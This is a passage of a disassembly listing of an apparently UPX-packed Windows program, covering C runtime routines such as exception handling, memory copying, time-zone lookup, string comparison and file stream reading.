[ebp+arg_8] push dword ptr [eax+0Ch] push [ebp+arg_0] call sub_421D16 add esp, 20h pop ebp retn sub_41C9A9 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41C9CE proc near ; CODE XREF: sub_421F58+25p var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h push ebp mov ebp, esp sub esp, 34h push ebx push esi push edi and [ebp+var_28], 0 mov [ebp+var_24], offset sub_41CA82 mov eax, [ebp+arg_10] mov [ebp+var_20], eax mov eax, [ebp+arg_4] mov [ebp+var_1C], eax mov eax, [ebp+arg_14] mov [ebp+var_18], eax mov eax, [ebp+arg_18] mov [ebp+var_14], eax and [ebp+var_10], 0 and [ebp+var_C], 0 and [ebp+var_8], 0 and [ebp+var_4], 0 mov [ebp+var_10], offset loc_41CA54 mov [ebp+var_C], esp mov [ebp+var_8], ebp mov eax, large fs:0 mov [ebp+var_28], eax lea eax, [ebp+var_28] mov large fs:0, eax mov [ebp+var_34], 1 mov eax, [ebp+arg_0] mov [ebp+var_30], eax mov eax, [ebp+arg_8] mov [ebp+var_2C], eax lea eax, [ebp+var_30] push eax mov eax, [ebp+arg_0] push dword ptr [eax] call ds:dword_4DBA04 pop ecx pop ecx and [ebp+var_34], 0 loc_41CA54: ; DATA XREF: sub_41C9CE+3Co cmp [ebp+var_4], 0 jz short loc_41CA71 mov ebx, large fs:0 mov eax, [ebx] mov ebx, [ebp+var_28] mov [ebx], eax mov large fs:0, ebx jmp short loc_41CA7A ; --------------------------------------------------------------------------- loc_41CA71: ; CODE XREF: sub_41C9CE+8Aj mov eax, [ebp+var_28] mov large fs:0, eax loc_41CA7A: ; CODE XREF: sub_41C9CE+A1j mov eax, [ebp+var_34] pop edi pop esi pop ebx leave retn sub_41C9CE endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41CA82 proc near ; DATA XREF: sub_41C9CE+Do arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp push ebx push esi push edi cld mov eax, [ebp+arg_0] mov eax, [eax+4] and eax, 66h test eax, eax jz short loc_41CAA5 mov eax, [ebp+arg_4] mov dword ptr [eax+24h], 1 push 1 pop eax jmp short loc_41CAF2 ; --------------------------------------------------------------------------- loc_41CAA5: ; CODE XREF: sub_41CA82+12j push 1 mov eax, [ebp+arg_4] push dword ptr [eax+14h] mov eax, [ebp+arg_4] push dword ptr [eax+10h] mov eax, [ebp+arg_4] push dword ptr [eax+8] push 0 push [ebp+arg_8] mov eax, [ebp+arg_4] push dword ptr [eax+0Ch] push [ebp+arg_0] call sub_421D16 add esp, 20h mov eax, [ebp+arg_4] cmp dword ptr [eax+24h], 0 jnz short loc_41CAE3 push [ebp+arg_0] push [ebp+arg_4] call sub_41C8D0 loc_41CAE3: ; CODE XREF: sub_41CA82+54j mov ebx, [ebp+arg_4] mov esp, [ebx+1Ch] mov ebp, [ebx+20h] jmp dword ptr [ebx+18h] ; --------------------------------------------------------------------------- push 1 pop eax loc_41CAF2: ; CODE XREF: sub_41CA82+21j pop edi pop esi pop ebx pop ebp retn sub_41CA82 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41CAF7 proc near ; CODE XREF: sub_421DB1+C6p ; sub_421F58+43p var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp push ecx push ebx push esi cmp [ebp+arg_4], 0 push edi mov edi, [ebp+arg_0] mov esi, [edi+0Ch] mov ebx, [edi+10h] mov eax, esi mov [ebp+arg_0], esi mov [ebp+var_4], eax jl short loc_41CB4E loc_41CB15: ; CODE XREF: sub_41CAF7+52j cmp esi, 0FFFFFFFFh jnz short loc_41CB1F call sub_4225B2 loc_41CB1F: ; CODE XREF: sub_41CAF7+21j mov ecx, [ebp+arg_8] dec esi lea eax, [esi+esi*4] cmp [ebx+eax*4+4], ecx lea eax, [ebx+eax*4] jge short loc_41CB34 cmp ecx, [eax+8] jle short loc_41CB39 loc_41CB34: ; CODE XREF: sub_41CAF7+36j cmp esi, 0FFFFFFFFh jnz short loc_41CB45 loc_41CB39: ; CODE XREF: sub_41CAF7+3Bj mov eax, [ebp+arg_0] dec [ebp+arg_4] mov [ebp+var_4], eax mov [ebp+arg_0], esi loc_41CB45: ; CODE XREF: sub_41CAF7+40j cmp [ebp+arg_4], 0 jge short loc_41CB15 mov eax, [ebp+var_4] loc_41CB4E: ; CODE XREF: sub_41CAF7+1Cj mov ecx, [ebp+arg_C] inc esi mov [ecx], esi mov ecx, [ebp+arg_10] mov [ecx], eax cmp eax, [edi+0Ch] ja short loc_41CB62 cmp esi, eax jbe short loc_41CB67 loc_41CB62: ; CODE XREF: sub_41CAF7+65j call sub_4225B2 loc_41CB67: ; CODE XREF: sub_41CAF7+69j lea eax, [esi+esi*4] pop edi pop esi lea eax, [ebx+eax*4] pop ebx leave retn sub_41CAF7 endp ; --------------------------------------------------------------------------- align 4 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41CB74 proc near ; CODE XREF: sub_4234B8+5Ap arg_0 = dword ptr 8 push ebp mov ebp, esp push ebx push esi push edi push ebp push 0 push 0 push offset loc_41CB8C push [ebp+arg_0] call sub_42675C ; RtlUnwind loc_41CB8C: ; DATA XREF: sub_41CB74+Bo pop ebp pop edi pop esi pop ebx mov esp, ebp pop ebp retn sub_41CB74 endp ; =============== S U B R O U T I N E ======================================= sub_41CB94 proc near ; DATA XREF: sub_41CBB6+Ao ; sub_41CC1E+9o arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_C = dword ptr 10h mov ecx, [esp+arg_0] test dword ptr [ecx+4], 6 mov eax, 1 jz short locret_41CBB5 mov eax, [esp+arg_4] mov edx, [esp+arg_C] mov [edx], eax mov eax, 3 locret_41CBB5: ; CODE XREF: sub_41CB94+10j retn sub_41CB94 endp ; =============== S U B R O U T I N E ======================================= sub_41CBB6 proc near ; CODE XREF: sub_422232+Dp ; sub_4234B8+67p ... var_14 = dword ptr -14h arg_0 = dword ptr 4 arg_4 = dword ptr 8 push ebx push esi push edi mov eax, [esp+0Ch+arg_0] push eax push 0FFFFFFFEh push offset sub_41CB94 push large dword ptr fs:0 mov large fs:0, esp loc_41CBD3: ; CODE XREF: sub_41CBB6:loc_41CC0Ej mov eax, [esp+1Ch+arg_0] mov ebx, [eax+8] mov esi, [eax+0Ch] cmp esi, 0FFFFFFFFh jz short loc_41CC10 cmp esi, [esp+1Ch+arg_4] jz short loc_41CC10 lea esi, [esi+esi*2] mov ecx, [ebx+esi*4] mov [esp+1Ch+var_14], ecx mov [eax+0Ch], ecx cmp dword ptr [ebx+esi*4+4], 0 jnz short loc_41CC0E push 101h mov eax, [ebx+esi*4+8] call sub_41CC4A call dword ptr [ebx+esi*4+8] loc_41CC0E: ; CODE XREF: sub_41CBB6+44j jmp short loc_41CBD3 ; --------------------------------------------------------------------------- loc_41CC10: ; CODE XREF: sub_41CBB6+2Aj ; sub_41CBB6+30j pop large dword ptr fs:0 add esp, 0Ch pop edi pop esi pop ebx retn sub_41CBB6 endp ; =============== S U B R O U T I N E ======================================= sub_41CC1E proc near ; CODE XREF: sub_422252+37p xor eax, eax mov ecx, large fs:0 cmp dword ptr [ecx+4], offset sub_41CB94 jnz short locret_41CC40 mov edx, [ecx+0Ch] mov edx, [edx+0Ch] cmp [ecx+8], edx jnz short locret_41CC40 mov eax, 1 locret_41CC40: ; CODE XREF: sub_41CC1E+10j ; sub_41CC1E+1Bj retn sub_41CC1E endp ; =============== S U B R O U T I N E ======================================= sub_41CC41 proc near ; CODE XREF: sub_422510+1Ep ; sub_422510+40p push ebx push ecx mov ebx, offset dword_43A98C jmp short loc_41CC54 sub_41CC41 endp ; =============== S U B R O U T I N E ======================================= sub_41CC4A proc near ; CODE XREF: sub_41CBB6+4Fp ; sub_4234B8+78p push ebx push ecx mov ebx, offset dword_43A98C mov ecx, [ebp+8] loc_41CC54: ; CODE XREF: sub_41CC41+7j mov [ebx+8], ecx mov [ebx+4], eax mov [ebx+0Ch], ebp pop ecx pop ebx retn 4 sub_41CC4A endp ; --------------------------------------------------------------------------- align 4 ; =============== S U B R O U T I N E ======================================= sub_41CC64 proc near ; CODE XREF: sub_40D07D+5p ; sub_40D21F+5p ... push 0FFFFFFFFh push eax mov eax, large fs:0 push eax mov eax, [esp+0Ch] mov large fs:0, esp mov [esp+0Ch], ebp lea ebp, [esp+0Ch] push eax retn sub_41CC64 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_41CC83 proc near ; CODE XREF: sub_40D6B4+26p ; UPX0:004264F2p ... arg_0 = dword ptr 4 push [esp+arg_0] call sub_41B0B1 pop ecx retn sub_41CC83 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41CC90 proc near ; CODE XREF: sub_40D725+3Ap ; sub_41DEA2+2EFp ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp push edi push esi mov esi, [ebp+arg_4] mov ecx, [ebp+arg_8] mov edi, [ebp+arg_0] mov eax, ecx mov edx, ecx add eax, esi cmp edi, esi jbe short loc_41CCB0 cmp edi, eax jb loc_41CE28 loc_41CCB0: ; CODE XREF: sub_41CC90+16j test edi, 3 jnz short loc_41CCCC shr ecx, 2 and edx, 3 cmp ecx, 8 jb short loc_41CCEC rep movsd jmp off_41CDD8[edx*4] ; --------------------------------------------------------------------------- loc_41CCCC: ; CODE XREF: sub_41CC90+26j mov eax, edi mov edx, 3 sub ecx, 4 jb short loc_41CCE4 and eax, 3 add ecx, eax jmp dword ptr loc_41CCEC+4[eax*4] ; --------------------------------------------------------------------------- loc_41CCE4: ; CODE XREF: sub_41CC90+46j jmp dword ptr loc_41CDE8[ecx*4] ; --------------------------------------------------------------------------- align 4 loc_41CCEC: ; CODE XREF: sub_41CC90+31j ; sub_41CC90+8Ej ... jmp off_41CD6C[ecx*4] ; --------------------------------------------------------------------------- db 90h dd offset loc_41CD00 dd offset loc_41CD2C dd offset loc_41CD50 ; --------------------------------------------------------------------------- loc_41CD00: ; DATA XREF: sub_41CC90+64o and edx, ecx mov al, [esi] mov [edi], al mov al, [esi+1] mov [edi+1], al mov al, [esi+2] shr ecx, 2 mov [edi+2], al add esi, 3 add edi, 3 cmp ecx, 8 jb short loc_41CCEC rep movsd jmp off_41CDD8[edx*4] ; --------------------------------------------------------------------------- align 4 loc_41CD2C: ; DATA XREF: sub_41CC90+68o and edx, ecx mov al, [esi] mov [edi], al mov al, [esi+1] shr ecx, 2 mov [edi+1], al add esi, 2 add edi, 2 cmp ecx, 8 jb short loc_41CCEC rep movsd jmp off_41CDD8[edx*4] ; --------------------------------------------------------------------------- align 10h loc_41CD50: ; DATA XREF: sub_41CC90+6Co and edx, ecx mov al, [esi] mov [edi], al inc esi shr ecx, 2 inc edi cmp ecx, 8 jb short loc_41CCEC rep movsd jmp off_41CDD8[edx*4] ; --------------------------------------------------------------------------- align 4 off_41CD6C dd offset loc_41CDCF ; DATA XREF: sub_41CC90:loc_41CCECr dd offset loc_41CDBC dd offset loc_41CDB4 dd offset loc_41CDAC dd offset loc_41CDA4 dd offset loc_41CD9C dd offset loc_41CD94 dd offset loc_41CD8C ; --------------------------------------------------------------------------- loc_41CD8C: ; CODE XREF: sub_41CC90:loc_41CCECj ; DATA XREF: sub_41CC90+F8o mov eax, [esi+ecx*4-1Ch] mov [edi+ecx*4-1Ch], eax loc_41CD94: ; CODE XREF: sub_41CC90:loc_41CCECj ; DATA XREF: sub_41CC90+F4o mov eax, [esi+ecx*4-18h] mov [edi+ecx*4-18h], eax loc_41CD9C: ; CODE XREF: sub_41CC90:loc_41CCECj ; DATA XREF: sub_41CC90+F0o mov eax, [esi+ecx*4-14h] mov [edi+ecx*4-14h], eax loc_41CDA4: ; CODE XREF: sub_41CC90:loc_41CCECj ; DATA XREF: sub_41CC90+ECo mov eax, [esi+ecx*4-10h] mov [edi+ecx*4-10h], eax loc_41CDAC: ; CODE XREF: sub_41CC90:loc_41CCECj ; DATA XREF: sub_41CC90+E8o mov eax, [esi+ecx*4-0Ch] mov [edi+ecx*4-0Ch], eax loc_41CDB4: ; CODE XREF: sub_41CC90:loc_41CCECj ; DATA XREF: sub_41CC90+E4o mov eax, [esi+ecx*4-8] mov [edi+ecx*4-8], eax loc_41CDBC: ; CODE XREF: sub_41CC90:loc_41CCECj ; DATA XREF: sub_41CC90+E0o mov eax, [esi+ecx*4-4] mov [edi+ecx*4-4], eax lea eax, ds:0[ecx*4] add esi, eax add edi, eax loc_41CDCF: ; CODE XREF: sub_41CC90:loc_41CCECj ; DATA XREF: sub_41CC90:off_41CD6Co jmp off_41CDD8[edx*4] ; --------------------------------------------------------------------------- align 4 off_41CDD8 dd offset loc_41CDE8 ; DATA XREF: sub_41CC90+35r ; sub_41CC90+92r ... dd offset loc_41CDF0 dd offset loc_41CDFC dd offset loc_41CE10 ; --------------------------------------------------------------------------- loc_41CDE8: ; CODE XREF: sub_41CC90+35j ; sub_41CC90+92j ... mov eax, [ebp+arg_0] pop esi pop edi leave retn ; --------------------------------------------------------------------------- align 10h loc_41CDF0: ; CODE XREF: sub_41CC90+35j ; sub_41CC90+92j ... mov al, [esi] mov [edi], al mov eax, [ebp+arg_0] pop esi pop edi leave retn ; --------------------------------------------------------------------------- align 4 loc_41CDFC: ; CODE XREF: sub_41CC90+35j ; sub_41CC90+92j ... mov al, [esi] mov [edi], al mov al, [esi+1] mov [edi+1], al mov eax, [ebp+arg_0] pop esi pop edi leave retn ; --------------------------------------------------------------------------- align 10h loc_41CE10: ; CODE XREF: sub_41CC90+35j ; sub_41CC90+92j ... mov al, [esi] mov [edi], al mov al, [esi+1] mov [edi+1], al mov al, [esi+2] mov [edi+2], al mov eax, [ebp+arg_0] pop esi pop edi leave retn ; --------------------------------------------------------------------------- align 4 loc_41CE28: ; CODE XREF: sub_41CC90+1Aj lea esi, [ecx+esi-4] lea edi, [ecx+edi-4] test edi, 3 jnz short loc_41CE5C shr ecx, 2 and edx, 3 cmp ecx, 8 jb short loc_41CE50 std rep movsd cld jmp off_41CF70[edx*4] ; --------------------------------------------------------------------------- align 10h loc_41CE50: ; CODE XREF: sub_41CC90+1B1j ; sub_41CC90+208j ... neg ecx jmp off_41CF20[ecx*4] ; --------------------------------------------------------------------------- align 4 loc_41CE5C: ; CODE XREF: sub_41CC90+1A6j mov eax, edi mov edx, 3 cmp ecx, 4 jb short loc_41CE74 and eax, 3 sub ecx, eax jmp dword ptr loc_41CE74+4[eax*4] ; --------------------------------------------------------------------------- loc_41CE74: ; CODE XREF: sub_41CC90+1D6j ; DATA XREF: sub_41CC90+1DDr jmp off_41CF70[ecx*4] ; --------------------------------------------------------------------------- align 4 dd offset loc_41CE87+1 dd offset loc_41CEA8 ; --------------------------------------------------------------------------- ror dh, 1 inc ecx loc_41CE87: ; DATA XREF: sub_41CC90+1ECo add [edx-2EDCFCBAh], cl mov [edi+3], al dec esi shr ecx, 2 dec edi cmp ecx, 8 jb short loc_41CE50 std rep movsd cld jmp off_41CF70[edx*4] ; --------------------------------------------------------------------------- align 4 loc_41CEA8: ; DATA XREF: sub_41CC90+1F0o mov al, [esi+3] and edx, ecx mov [edi+3], al mov al, [esi+2] shr ecx, 2 mov [edi+2], al sub esi, 2 sub edi, 2 cmp ecx, 8 jb short loc_41CE50 std rep movsd cld jmp off_41CF70[edx*4] ; --------------------------------------------------------------------------- align 10h mov al, [esi+3] and edx, ecx mov [edi+3], al mov al, [esi+2] mov [edi+2], al mov al, [esi+1] shr ecx, 2 mov [edi+1], al sub esi, 3 sub edi, 3 cmp ecx, 8 jb loc_41CE50 std rep movsd cld jmp off_41CF70[edx*4] ; --------------------------------------------------------------------------- align 4 dd offset loc_41CF24 dd offset loc_41CF2C dd offset loc_41CF34 dd offset loc_41CF3C dd offset loc_41CF44 dd offset loc_41CF4C dd offset loc_41CF54 off_41CF20 dd offset loc_41CF67 ; DATA XREF: sub_41CC90+1C2r ; --------------------------------------------------------------------------- loc_41CF24: ; DATA XREF: sub_41CC90+274o mov eax, [esi+ecx*4+1Ch] mov [edi+ecx*4+1Ch], eax loc_41CF2C: ; DATA XREF: sub_41CC90+278o mov eax, [esi+ecx*4+18h] mov [edi+ecx*4+18h], eax loc_41CF34: ; DATA XREF: sub_41CC90+27Co mov eax, [esi+ecx*4+14h] mov [edi+ecx*4+14h], eax loc_41CF3C: ; DATA XREF: sub_41CC90+280o mov eax, [esi+ecx*4+10h] mov [edi+ecx*4+10h], eax loc_41CF44: ; DATA XREF: sub_41CC90+284o mov eax, [esi+ecx*4+0Ch] mov [edi+ecx*4+0Ch], eax loc_41CF4C: ; DATA XREF: sub_41CC90+288o mov eax, [esi+ecx*4+8] mov [edi+ecx*4+8], eax loc_41CF54: ; DATA XREF: sub_41CC90+28Co mov eax, [esi+ecx*4+4] mov [edi+ecx*4+4], eax lea eax, ds:0[ecx*4] add esi, eax add edi, eax loc_41CF67: ; CODE XREF: sub_41CC90+1C2j ; DATA XREF: sub_41CC90:off_41CF20o jmp off_41CF70[edx*4] ; --------------------------------------------------------------------------- align 10h off_41CF70 dd offset loc_41CF80 ; DATA XREF: sub_41CC90+1B7r ; sub_41CC90:loc_41CE74r ... dd offset loc_41CF88 dd offset loc_41CF98 dd offset loc_41CFAC ; --------------------------------------------------------------------------- loc_41CF80: ; CODE XREF: sub_41CC90+1B7j ; sub_41CC90:loc_41CE74j ... mov eax, [ebp+arg_0] pop esi pop edi leave retn ; --------------------------------------------------------------------------- align 4 loc_41CF88: ; CODE XREF: sub_41CC90+1B7j ; sub_41CC90:loc_41CE74j ... mov al, [esi+3] mov [edi+3], al mov eax, [ebp+arg_0] pop esi pop edi leave retn ; --------------------------------------------------------------------------- align 4 loc_41CF98: ; CODE XREF: sub_41CC90+1B7j ; sub_41CC90:loc_41CE74j ... mov al, [esi+3] mov [edi+3], al mov al, [esi+2] mov [edi+2], al mov eax, [ebp+arg_0] pop esi pop edi leave retn ; --------------------------------------------------------------------------- align 4 loc_41CFAC: ; CODE XREF: sub_41CC90+1B7j ; sub_41CC90:loc_41CE74j ... mov al, [esi+3] mov [edi+3], al mov al, [esi+2] mov [edi+2], al mov al, [esi+1] mov [edi+1], al mov eax, [ebp+arg_0] pop esi pop edi leave retn sub_41CC90 endp ; =============== S U B R O U T I N E ======================================= sub_41CFC5 proc near ; CODE XREF: sub_40D78C+34p ; sub_40D78C+4Fp ... arg_0 = dword ptr 4 push 1 push [esp+4+arg_0] call sub_41B4E7 pop ecx pop ecx retn sub_41CFC5 endp ; =============== S U B R O U T I N E ======================================= sub_41CFD3 proc near ; CODE XREF: sub_41D040+4p arg_0 = dword ptr 4 push esi push ds:dword_4DCFFC call sub_422608 mov edx, ds:dword_4DCFFC pop ecx mov ecx, ds:dword_4DCFF8 mov esi, ecx sub esi, edx add esi, 4 cmp eax, esi pop esi jnb short loc_41D032 push edx call sub_422608 add eax, 10h push eax push ds:dword_4DCFFC call sub_41B202 add esp, 0Ch test eax, eax jnz short loc_41D015 retn ; --------------------------------------------------------------------------- loc_41D015: ; CODE XREF: sub_41CFD3+3Fj mov ecx, ds:dword_4DCFF8 sub ecx, ds:dword_4DCFFC mov ds:dword_4DCFFC, eax sar ecx, 2 lea ecx, [eax+ecx*4] mov ds:dword_4DCFF8, ecx loc_41D032: ; CODE XREF: sub_41CFD3+23j mov eax, [esp+arg_0] mov [ecx], eax add ds:dword_4DCFF8, 4 retn sub_41CFD3 endp ; =============== S U B R O U T I N E ======================================= sub_41D040 proc near ; CODE XREF: sub_40D879+1Ap arg_0 = dword ptr 4 push [esp+arg_0] call sub_41CFD3 neg eax sbb eax, eax pop ecx neg eax dec eax retn sub_41D040 endp ; =============== S U B R O U T I N E ======================================= sub_41D052 proc near ; DATA XREF: UPX0:0042901Co push 80h call sub_41B4D5 test eax, eax pop ecx mov ds:dword_4DCFFC, eax jnz short loc_41D073 push 18h call sub_41DA29 mov eax, ds:dword_4DCFFC pop ecx loc_41D073: ; CODE XREF: sub_41D052+12j and dword ptr [eax], 0 mov eax, ds:dword_4DCFFC mov ds:dword_4DCFF8, eax retn sub_41D052 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41D081 proc near ; CODE XREF: sub_40D99C+1B0p var_CC = byte ptr -0CCh var_32 = word ptr -32h var_24 = dword ptr -24h var_20 = word ptr -20h var_1E = word ptr -1Eh var_1A = word ptr -1Ah var_18 = word ptr -18h var_16 = word ptr -16h var_10 = word ptr -10h var_E = word ptr -0Eh var_A = word ptr -0Ah var_8 = word ptr -8 var_6 = word ptr -6 var_4 = word ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 0CCh lea eax, [ebp+var_10] push eax call dword_42712C ; GetLocalTime lea eax, [ebp+var_20] push eax call dword_4271A4 ; GetSystemTime mov ax, [ebp+var_16] cmp ax, ds:word_4DB9C2 jnz short loc_41D0E6 mov ax, [ebp+var_18] cmp ax, ds:word_4DB9C0 jnz short loc_41D0E6 mov ax, [ebp+var_1A] cmp ax, ds:word_4DB9BE jnz short loc_41D0E6 mov ax, [ebp+var_1E] cmp ax, ds:word_4DB9BA jnz short loc_41D0E6 mov ax, [ebp+var_20] cmp ax, ds:word_4DB9B8 jnz short loc_41D0E6 mov eax, ds:dword_4DB9B0 jmp short loc_41D12B ; --------------------------------------------------------------------------- loc_41D0E6: ; CODE XREF: sub_41D081+28j ; sub_41D081+35j ... lea eax, [ebp+var_CC] push eax call dword_4271A0 ; GetTimeZoneInformation cmp eax, 0FFFFFFFFh jz short loc_41D113 cmp eax, 2 jnz short loc_41D10F cmp [ebp+var_32], 0 jz short loc_41D10F cmp [ebp+var_24], 0 jz short loc_41D10F push 1 pop eax jmp short loc_41D116 ; --------------------------------------------------------------------------- loc_41D10F: ; CODE XREF: sub_41D081+7Aj ; sub_41D081+81j ... xor eax, eax jmp short loc_41D116 ; --------------------------------------------------------------------------- loc_41D113: ; CODE XREF: sub_41D081+75j or eax, 0FFFFFFFFh loc_41D116: ; CODE XREF: sub_41D081+8Cj ; sub_41D081+90j push esi push edi lea esi, [ebp+var_20] mov edi, offset word_4DB9B8 movsd movsd movsd movsd pop edi mov ds:dword_4DB9B0, eax pop esi loc_41D12B: ; CODE XREF: sub_41D081+63j push eax movzx eax, [ebp+var_4] push eax movzx eax, [ebp+var_6] push eax movzx eax, [ebp+var_8] push eax movzx eax, [ebp+var_A] push eax movzx eax, [ebp+var_E] push eax movzx eax, [ebp+var_10] push eax call sub_422669 mov ecx, [ebp+arg_0] add esp, 1Ch test ecx, ecx jz short locret_41D15B mov [ecx], eax locret_41D15B: ; CODE XREF: sub_41D081+D6j leave retn sub_41D081 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41D160 proc near ; CODE XREF: sub_40D99C+18p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push edi push esi push ebx mov esi, [ebp+arg_4] mov edi, [ebp+arg_0] lea eax, dword_4DBA0C cmp dword ptr [eax+8], 0 jnz short loc_41D1B3 mov al, 0FFh mov edi, edi loc_41D17C: ; CODE XREF: sub_41D160+28j ; sub_41D160+48j or al, al jz short loc_41D1AE mov al, [esi] inc esi mov ah, [edi] inc edi cmp ah, al jz short loc_41D17C sub al, 41h cmp al, 1Ah sbb cl, cl and cl, 20h add al, cl add al, 41h xchg ah, al sub al, 41h cmp al, 1Ah sbb cl, cl and cl, 20h add al, cl add al, 41h cmp al, ah jz short loc_41D17C sbb al, al sbb al, 0FFh loc_41D1AE: ; CODE XREF: sub_41D160+1Ej movsx eax, al jmp short loc_41D1E7 ; --------------------------------------------------------------------------- loc_41D1B3: ; CODE XREF: sub_41D160+16j mov eax, 0FFh xor ebx, ebx mov edi, edi loc_41D1BC: ; CODE XREF: sub_41D160+68j ; sub_41D160+80j or al, al jz short loc_41D1E7 mov al, [esi] inc esi mov bl, [edi] inc edi cmp al, bl jz short loc_41D1BC push eax push ebx call sub_41D74C mov ebx, eax add esp, 4 call sub_41D74C add esp, 4 cmp bl, al jz short loc_41D1BC sbb eax, eax sbb eax, 0FFFFFFFFh loc_41D1E7: ; CODE XREF: sub_41D160+51j ; sub_41D160+5Ej pop ebx pop esi pop edi leave retn sub_41D160 endp ; =============== S U B R O U T I N E ======================================= sub_41D1EC proc near ; CODE XREF: sub_411797+26Ep ; sub_411797+37Dp arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push esi mov esi, [esp+4+arg_0] push edi mov eax, [esi+0Ch] test al, 83h jz short loc_41D268 mov edi, [esp+8+arg_8] test edi, edi jz short loc_41D20B cmp edi, 1 jz short loc_41D20B cmp edi, 2 jnz short loc_41D268 loc_41D20B: ; CODE XREF: sub_41D1EC+13j ; sub_41D1EC+18j and al, 0EFh cmp edi, 1 mov [esi+0Ch], eax jnz short loc_41D222 push esi call sub_4227C5 add [esp+0Ch+arg_4], eax pop ecx xor edi, edi loc_41D222: ; CODE XREF: sub_41D1EC+27j push esi call sub_41DB8B mov eax, [esi+0Ch] pop ecx test al, 80h jz short loc_41D237 and al, 0FCh mov [esi+0Ch], eax jmp short loc_41D24B ; --------------------------------------------------------------------------- loc_41D237: ; CODE XREF: sub_41D1EC+42j test al, 1 jz short loc_41D24B test al, 8 jz short loc_41D24B test ah, 4 jnz short loc_41D24B mov dword ptr [esi+18h], 200h loc_41D24B: ; CODE XREF: sub_41D1EC+49j ; sub_41D1EC+4Dj ... push edi push [esp+0Ch+arg_4] push dword ptr [esi+10h] call sub_42272B add esp, 0Ch xor ecx, ecx cmp eax, 0FFFFFFFFh setnz cl dec ecx mov eax, ecx jmp short loc_41D275 ; --------------------------------------------------------------------------- loc_41D268: ; CODE XREF: sub_41D1EC+Bj ; sub_41D1EC+1Dj mov ds:dword_4DB958, 16h or eax, 0FFFFFFFFh loc_41D275: ; CODE XREF: sub_41D1EC+7Aj pop edi pop esi retn sub_41D1EC endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_41D280 proc near ; CODE XREF: sub_412B09+19Ep ; sub_41386C+11Bp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch arg_C = dword ptr 10h mov eax, [esp+arg_4] mov ecx, [esp+arg_C] or ecx, eax mov ecx, [esp+arg_8] jnz short loc_41D299 mov eax, [esp+arg_0] mul ecx retn 10h ; --------------------------------------------------------------------------- loc_41D299: ; CODE XREF: sub_41D280+Ej push ebx mul ecx mov ebx, eax mov eax, [esp+4+arg_0] mul [esp+4+arg_C] add ebx, eax mov eax, [esp+4+arg_0] mul ecx add edx, ebx pop ebx retn 10h sub_41D280 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41D2B4 proc near ; CODE XREF: sub_4161BD+127p var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp push ecx push ebx push esi push edi mov edi, [ebp+arg_4] imul edi, [ebp+arg_8] mov eax, [ebp+arg_0] mov [ebp+var_4], edi test edi, edi mov [ebp+arg_0], eax mov ebx, edi jnz short loc_41D2D8 xor eax, eax jmp loc_41D3A5 ; --------------------------------------------------------------------------- loc_41D2D8: ; CODE XREF: sub_41D2B4+1Bj mov esi, [ebp+arg_C] test word ptr [esi+0Ch], 10Ch jz short loc_41D2EB mov eax, [esi+18h] mov [ebp+arg_C], eax jmp short loc_41D2F2 ; --------------------------------------------------------------------------- loc_41D2EB: ; CODE XREF: sub_41D2B4+2Dj mov [ebp+arg_C], 1000h loc_41D2F2: ; CODE XREF: sub_41D2B4+35j ; sub_41D2B4+E8j mov ecx, [esi+0Ch] and ecx, 108h jz short loc_41D326 mov eax, [esi+4] test eax, eax jz short loc_41D326 cmp ebx, eax mov edi, ebx jb short loc_41D30C mov edi, eax loc_41D30C: ; CODE XREF: sub_41D2B4+54j push edi push [ebp+arg_0] push dword ptr [esi] call sub_41C310 sub [esi+4], edi add [esi], edi add esp, 0Ch sub ebx, edi add [ebp+arg_0], edi jmp short loc_41D36C ; --------------------------------------------------------------------------- loc_41D326: ; CODE XREF: sub_41D2B4+47j ; sub_41D2B4+4Ej cmp ebx, [ebp+arg_C] jb short loc_41D371 test ecx, ecx jz short loc_41D33A push esi call sub_41DB8B test eax, eax pop ecx jnz short loc_41D3B3 loc_41D33A: ; CODE XREF: sub_41D2B4+79j cmp [ebp+arg_C], 0 jz short loc_41D34D mov eax, ebx xor edx, edx div [ebp+arg_C] mov edi, ebx sub edi, edx jmp short loc_41D34F ; --------------------------------------------------------------------------- loc_41D34D: ; CODE XREF: sub_41D2B4+8Aj mov edi, ebx loc_41D34F: ; CODE XREF: sub_41D2B4+97j push edi push [ebp+arg_0] push dword ptr [esi+10h] call sub_42291D add esp, 0Ch cmp eax, 0FFFFFFFFh jz short loc_41D3AA add [ebp+arg_0], eax sub ebx, eax cmp eax, edi jb short 